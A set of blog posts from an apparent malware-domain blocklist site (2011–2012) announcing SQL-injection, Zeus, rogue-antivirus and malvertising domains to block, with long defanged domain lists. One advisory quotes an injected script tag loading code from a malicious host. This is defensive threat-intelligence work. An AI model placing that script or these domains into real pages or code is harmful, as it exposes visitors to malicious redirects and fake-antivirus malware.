Feed

Domains and IPs to Block ASAP

Posted on August 9th, 2012 in 0day,sql injection by dglosser

Two posts from the Internet Storm Center:
SQL Injection Lilupophilupop style –Lists about a dozen domains you should immediately add to your blocklists plus more in Dynamoos blog.

Zeus/Citadel variant causing issues in the Netherlands – Follow the links and block  those IP addresses

 

 

 

sqli: Block Njukol -dot – com

Posted on April 29th, 2012 in 0day,iframes,New Domains,sql injection by dglosser

We received a report that there’s  a sqli injection going on with  njukol . com/ r.php.  Please check your web sites and add this to your block or shun list.      Original Source: http://ilion.blog47.fc2.com/

hostexploit.com top bad hosts – 2012 Q1

Posted on April 18th, 2012 in iframes,malvertising,New Domains,sql injection,Trojans by dglosser

We added our friends nikjju . com and best-antiviruu.de .lv and also listed domains from ISP’s or hosting services listed on hostexploit.com‘s  Q1 report on the top bad hosts.  To round things out,  we also added domains flagged by  sucuri  as having malicious javascript or iframes.

Compressed files are located at: http://www.malware-domains.com (full zone files, note the dash)  and http://dns-bh.sagadc.org/.  We also have a mirror dedicated to research and Open Source Projects – contact us for details.

* Please help to keep this site free and donate whatever you can:  All donations go to hosting and infrastructure costs.
* These malware block lists provided here are for free for noncommercial use as part of the fight against malware.   Any use of this list commercially is strictly prohibited without prior approval.
* Please use the “datestamp” and “timestamp” file to determine if the list has been updated and ONLY pull the files you need – abusers will be banned! Use wget -N”!
* Yearly sponsorships are available. Full acknowledgment, an icon, and link back to your site will be placed in the left sidebar.
* Domains.txt file is the complete list along with original reference. Justdomains contains list of only the domain names. BOOT file is in MS DNS format. Malwaredomains.zones file is in BIND format.  Also Available in AdBlock, ISA, and MaraDNS formats. A trusted source on the WOT-the Web of Trust . Used by SURBL, MOREnet, SANs, and others…

Urgent Block: nikjju.com and best-antiviruu.de.lv

Posted on April 17th, 2012 in 0day,iframes,rogue antivirus,sql injection by dglosser

Sucuri  is reporting a new Mass SQL Injection campaign.  Sites are infected with the following javascript:

<script src= http://nikjju . com/r.php ></script>

which redirects to Fake/Rogue AV sites such as best-antiviruu. de. lv

Please add these sites to your blocklists and sinkholes ASAP.

Urgent Block: ionis90landsi -dot- rr -dot- nu — Mass Injection of WordPress Websites

Posted on March 6th, 2012 in 0day,sql injection by dglosser

Websense has posted an article relating to mass SQL  injection into wordpress sites.  The domain is  ionis90landsi.  rr.   nu     (spaces added)

This link seems to have a larger list  of domains to block…

iframe,sqli,cybercriminal domains

Posted on December 3rd, 2011 in 0day,iframes,New Domains,Spyeye,Trojans,zeus by dglosser

A small but important update containing domains associated with iframes, cybercriminals, zeus, and our friend lilupophilupop . com.   Sources include malc0de.com, safebrowsing.google.com, www.spamhaus.org (Every source is  listed in the domains.txt file)…

Reminder: the mirror for compressed zip files is up and running – please contact us for details – right now it has very little usage.

Please help to keep this site free and donate whatever you can:  All donations go to hosting and infrastructure costs.

These malware block lists provided here are for free for noncommercial use as part of the fight against malware.   Any use of this list commercially is strictly prohibited without prior approval.

Please use the “datestamp” and “timestamp” file to determine if the list has been updated and ONLY pull the files you need – abusers will be banned!

Yearly sponsorships are available. Full acknowledgment, an icon, and link back to your site will be placed in the left sidebar.

Domains.txt file is the complete list along with original reference.
Justdomains contains list of only the domain names.

BOOT file is in MS DNS format. spywaredomains.zones file is in BIND format.

Also Available in AdBlock, ISA, and MaraDNS formats.

A trusted source on the WOT-the Web of Trust . Used by SURBL, MOREnet, SANs, and others…

Urgent Block: lilupophilupop-dot-com (SQL Injection)

Posted on December 2nd, 2011 in 0day,sql injection by dglosser

SANs is reporting that there’s a SQLi campaign going on right now with the malicious domain lilupophilupop .com being injected into sites running MSSQL.

We will block that domain on the next update but you shouldn’t wait….

Source: http://isc.sans.edu/diary.html?storyid=12127#comment

SQLi, Fastflux Botnet, Dirt Jumper and more

Posted on October 25th, 2011 in fastflux,New Domains,RBN,rogue antivirus,Spyeye,sql injection,zeus by dglosser

Added 210 domains associated with SQLi, Dirt Jumper, RBN, fast flux botnets and other maliciousness. Sources include blog.dynamoo.com, ddanchev.blogspot.com, www.malwareurl.com and others

(Every source is  listed in the domains.txt file)

Please help to keep this site free and donate whatever you can:  All donations go to hosting and infrastructure costs.

These malware block lists provided here are for free for noncommercial use as part of the fight against malware.   Any use of this list commercially is strictly prohibited without prior approval.

Yearly sponsorships are available. Full acknowledgment, an icon, and link back to your site will be placed in the left sidebar.

Domains.txt file is the complete list along with original reference.
Justdomains contains list of only the domain names.

BOOT file is in MS DNS format. spywaredomains.zones file is in BIND format. (The mirror for compressed zip files is up and running – please contact us for details.)

Also Available in AdBlock, ISA, and MaraDNS formats.

A trusted source on the WOT-the Web of Trust . Used by SURBL, MOREnet, SANs, and others…

251 new domains: malvertising, zeus v2.0, spyeye, rogues…

Posted on June 19th, 2011 in malvertising,New Domains,rogue antivirus,sql injection,zeus by dglosser

251 new domains added. These domains are associated with Zeus v2.0, spyeye, rogue security, malverising, sql injection.. Sources include tristatelogic.com, vxvault.siri-urz.net, www.spamhaus.org… (Every source is  listed in the domains.txt file):

0fees .net 1mmjl3l45lkjbdb .ru
19995588 .com abodeflashplayer .co .tv
27cms .eu act1floral .ce .ms
2ok .cz .cc
4r4 .cz .cc agreement52 .com
9f1 .cz .cc ameryvarlaam .ru
aloveb .biz asteriadurrand .cz .cc
astro-cash .biz avs-america .com
atuno .it avs-industry .com
avs-carter .com avs-property .com
avs-elite .com avs-solutions .com
avs-mobile .com avsdelivery .com
avs-nevada .com avsindustry .com
avs-prime .com avsphotography .com
avs-retail .com avswergroup .com
avs-tech .com avswerlakers .com
avs-thai .com avsweronline .com
avs-tract .com dietacaiberry .net
avselite .com dirtyrottenwhore .com
avslakers .com djevel00 .fileave .com
avsretail .com drricardoyepez .org
avstract .com esformofset .com
avswer .com europole-formations .fr
avswerxp .com financialdeposit .com
bumbara .co .cc fkfxzhxxqk .cx .cc
csmart .co .kr gaufridboris .ru
dmzcamp .com giantsoft .co .kr
eaevdgg .cz .cc googlestatick1 .cz .cc
ebooksit .com googlestatick2 .cz .cc
einemenge .info googlestatick3 .cz .cc
elpcez .ce .ms googlestatick4 .cz .cc
exbii .com gopinathabengt .ru
fd5 .cz .cc hanneke37013 .cz .cc
flashloads .net hideomechanic .com
frankiees .ru hosting161-flash .redirectme .net
frankieeus .ru hqxvideofree .com
friskyvids .com idatelyfumiu .linkpc .net
gamesbaidu .com img105 .herosh .com
getwayshop .ru iooodarauisj .cz .cc
goleleila .ir ipatoghdl .cz .cc
gwynyasser .ru jasoncmeyer .ce .ms
gzjianren .com jdfehxrzsbtrbiju .com
h7k .in jh99-v5 .cable-modem .org
hzcor .ce .ms kamarovoskolkovo .ru
hzw .co .be karabasbaraba .ru
jcwbqlj .cz .cc kingofpirates .co .cc
ji0ns .com klubnika34his .com
jsbanners7 .com kosmodromkan .ru
jsbanners8 .com lakersvswer .com
jwjmusic .cx .cc lcvjooxjnd .cx .cc
kangnam .co .kr multimediamodifydata .in
kljygsvbfs .in myobfuscate .com
kol0 .com mywebspace1 .tld .tc
kombek .org needble-for .findhere .org
kposjuhnfs .in nowdonload .co .cc
kxpeolxi .cz .cc nvhyaghjsd .cz .cc
leonidyonah .ru oeuroiuasd .cz .cc
lfug .co .cc officialversion .su
myavswer .com ojusdtgfrshd .cz .cc
myzhuzi .com olasaqyuijuk .linkpc .net
newavswer .com online11news .com
newinet .co .cc online11news .ru
newtubes .in online12flash .com
nxmtv .info online12news .com
nyoflak .com online12news .ru
oboi-msk .ru online13flash .com
on10news .com online13news .com
on10news .ru online13news .ru
on11news .com online14flash .com
on11news .ru online14news .com
on12news .com online14news .ru
on12news .ru online15flash .com
on13news .com online15news .com
on13news .ru online15news .ru
on14news .ru online16flash .com
on15news .ru online16news .com
on16news .ru online16news .ru
on17news .ru online17news .com
on18news .ru online17news .ru
on19news .ru online18news .com
on1news .com online18news .ru
on1news .ru online19news .com
on20news .ru online19news .ru
on2news .com online20news .ru
on2news .ru online2flash .com
on3news .com online3flash .com
online1news .ru online4flash .com
online2news .ru online5flash .com
online3news .ru online6flash .com
online4news .ru online7flash .com
online5news .ru online8flash .com
online6news .ru online9flash .com
online7news .ru onlinehome-writer .com
online8news .ru ouiqweghukas .cz .cc
online9news .ru parrisherakles .ru
openx .net poqlkanbbbba .cz .cc
opopop23 .cz .cc qeuirigasdfg .cz .cc
promoads .eu qophjgasg .cz .cc
qhnfmmpp .co .cc qwechecksystem .com
qwea .cz .cc realdyhelp .rr .nu
qzgsl .com rjhomesolutions .com
shopgetway .ru sajjadiuppiter .ru
slolor .cz .cc sextubecentral .com
soptnsa .co .cc sexxeschikkaxxx .serveftp .com
star99 .info sexyteenage .net
stephanos .ru software-avs .com
theavswer .com srtjhasthae1 .cz .cc
tnbzrkrm .co .cc statpdomwas .cx .cc
tomaromain .ru strongmdefense .findhere .org
trackups .org svatebniprani .us
ubitorent .com tradekerala .com
upsclients .com tubedownloader2010 .com
upstrack .net tunes-new-online-downloads .com
ushcime .com tvmovie-sale .com
vaccineu .com tvsportschannel .com
webwarper .net tweeter001 .co .cc
whitesmoke .com usps .com .trackr04 .com
whitesmoke .us viautytdsfs .cz .cc
wogehed .cz .cc videospornodetv .com
xdnsrv .com vtqssamktp .cx .cc
xrtik .ipq .co wait-50-seconds .cz .cc
xts-1a .noc .su web-worldmap .com
zalsdre .vv .cc whitesmoke .co .il
zamhuxnh .cz .cc ydimefanilyju .linkpc .net
zeckzer .ce .ms yhonaguecisy .publicvm .com
zojozvrm .co .cc

Please help to keep this site free and donate whatever you can:  All donations go to hosting and infrastructure costs.

This malware block lists provided here are for free for noncommercial use as part of the fight against malware.   Any use of this list commercially is strictly prohibited without prior approval.

Yearly sponsorships are available. Full acknowledgment, an icon, and link back to your site will be placed in the left sidebar.

Domains.txt file is the complete list along with original reference.
Justdomains contains list of only the domain names.

Please download files from main mirror: http://mirror1.malwaredomains.com/files/

BOOT file is in MS DNS format. spywaredomains.zones file is in BIND format.

Also Available in AdBlock, ISA, and MaraDNS formats.

A trusted source on the WOT-the Web of Trust . Used by SURBL, MOREnet, SANs, and others…

Malvertising, rbn, rogue, sql injection domains

Posted on June 17th, 2011 in exploit,New Domains,RBN,rogue antivirus,sql injection,Trojans,zeus by dglosser

Added over 200 domains associated with malvertising, Rogue/fake security, sql injection, etc. Sources include blog.dynamoo.com, community.websense.com, research.zscaler.com (Every source is  listed in the domains.txt file):

azetuair .cc 77-platform .net
baooe0 .com badodybeqyk .com
baooe1 .com bestbanners1 .in
baooe2 .com bestbanners2 .in
bazagg .cz .cc bestbanners3 .in
bedioger .com bestbanners4 .in
bhbdzmjy .co .tv bestbanners5 .in
bookaros .com bestbanners6 .in
bookarra .com bestbanners7 .in
bookdolo .com bestbanners8 .in
bookfula .com bestbanners9 .in
bookgusa .com bocikivihepiqa .com
bookmonn .com bunizywytyg .com
bookmono .com clanthefallen .com
bookmylo .com creditsofast .com
bookpolo .com dead-melpomene .com
booksgou .com ecxajgff .co .tv
booksoco .com eddddbzm .co .tv
bookvivi .com enukunaziha .com
bookvoxy .com eqezifebawe .com
bookzoul .com farelfusion .com
bookzula .com fkejoten .co .tv
bqhfvvdn .co .tv gb-offerlist .com
c8s2 .com greenhopengo .com
cbneehtm .co .tv hamobamaduro .com
ccjayplh .co .tv hepotevena .com
cjr001 .com herovidacege .com
dbonis .com high-webtraffic .com
demivee .in hocxhnrl .co .tv
divinemeb .com hydezerirevy .com
drber0 .com hydyfiliduzun .com
drber1 .com ibyfolyzijym .com
drber2 .com itzqmiip .co .tv
drber3 .com jawynuvejeqini .com
drber4 .com jazafibyho .com
drber5 .com jiqixylexut .com
drber6 .com jujbytqe .co .tv
drber7 .com jyviziwopakisy .com
drber8 .com keepitunreal .in
drber9 .com kolifixewitiq .com
dzedshuw .co .tv kovejyvymuzi .com
efidaxamo .com lajogitytudaxo .com
erdvjn1 .com linuxbanners1 .in
erdvjn2 .com linuxbanners4 .in
erdvjn6 .com linuxbanners5 .in
erdvjn8 .com linuxbanners6 .in
erdvjn9 .com linuxbanners7 .in
erlvn0 .com lucuhojivinu .com
erlvn1 .com mediabulker .com
erlvn2 .com mehyqibugyluf .com
erlvn3 .com mentorcentral .com
erlvn4 .com mentorcentral .net
erlvn5 .com milotynabojavo .com
erlvn6 .com mipituhamys .com
erlvn7 .com misyneqewetypo .com
erlvn8 .com msor72-gate1 .vv .cc
erlvn9 .com mzpupkqo .co .tv
f10 .xl .cx neddhilr .co .tv
f8d3 .net okvmodps .co .tv
findclear .org orrick-media .eu
findstiff .org pacugegyfeheka .com
h94 .org pboysxaj .co .tv
hurdana .cx .cc pijynazerud .com
lawujocot .com pivysegocide .com
legse .co .cc premium-support-2011 .com
macbanners .in premiumsupport2011 .com
mediawork .com qbzaqmse .co .tv
nopirekuz .com rblvsbht .co .tv
paybal .com rowxhoai .co .tv
q9z4 .com rvcxwsmt .co .tv
qubmoviez .com sbzjrszn .co .tv
rappour .in scoregaskets .com
replity .in searchcruel .org
ripplig .in searchgrubby .org
s9w3 .com smartsecuritybox .com
s9w3 .net sositawidapezi .com
sgsge0 .com sweetnovelty .com
sgsge2 .com tesonugixamys .com
sgsge3 .com testosploitron .cx .cc
sgsge4 .com thingortwo .com
sgsge5 .com tikytudububy .com
sgsge6 .com traffic-dc .com
sgsge7 .com trjmytqlnhyovlpv .com
sgsge8 .com vakatesumuhor .com
sgsge9 .com vusysogirebymy .com
sharkpork .com vuvamewakoq .com
smrbr0 .com vyzaraputifyb .com
smrbr3 .com wamikopyzoqah .com
smrbr8 .com wekabamysugamy .com
smrbr9 .com windowsbanners .in
t9i2 .org wkrfgzoc .co .tv
t9i3 .com wkydwlkk .co .tv
t9i3 .org xazofeberus .com
tuartma .in xfrfrwjd .co .tv
uev1 .co .cc xipagymofi .com
uralgaz .ru xisebozenaj .com
uxuvoxogy .com xnnblhid .co .tv
videoskk .org zarqqasx .co .tv
y8r5 .com zhkeinzr .co .tv
yjybocore .com zonsolemonito .com
zapppo1 .org zzxfyrru .co .tv
zyfovubyv .com

Please help to keep this site free and donate whatever you can:  All donations go to hosting and infrastructure costs.

This malware block lists provided here are for free for noncommercial use as part of the fight against malware.   Any use of this list commercially is strictly prohibited without prior approval.

Yearly sponsorships are available. Full acknowledgment, an icon, and link back to your site will be placed in the left sidebar.

Domains.txt file is the complete list along with original reference.
Justdomains contains list of only the domain names.

Please download files from main mirror: http://mirror1.malwaredomains.com/files/

BOOT file is in MS DNS format. spywaredomains.zones file is in BIND format.

Also Available in AdBlock, ISA, and MaraDNS formats.

A trusted source on the WOT-the Web of Trust . Used by SURBL, MOREnet, SANs, and others…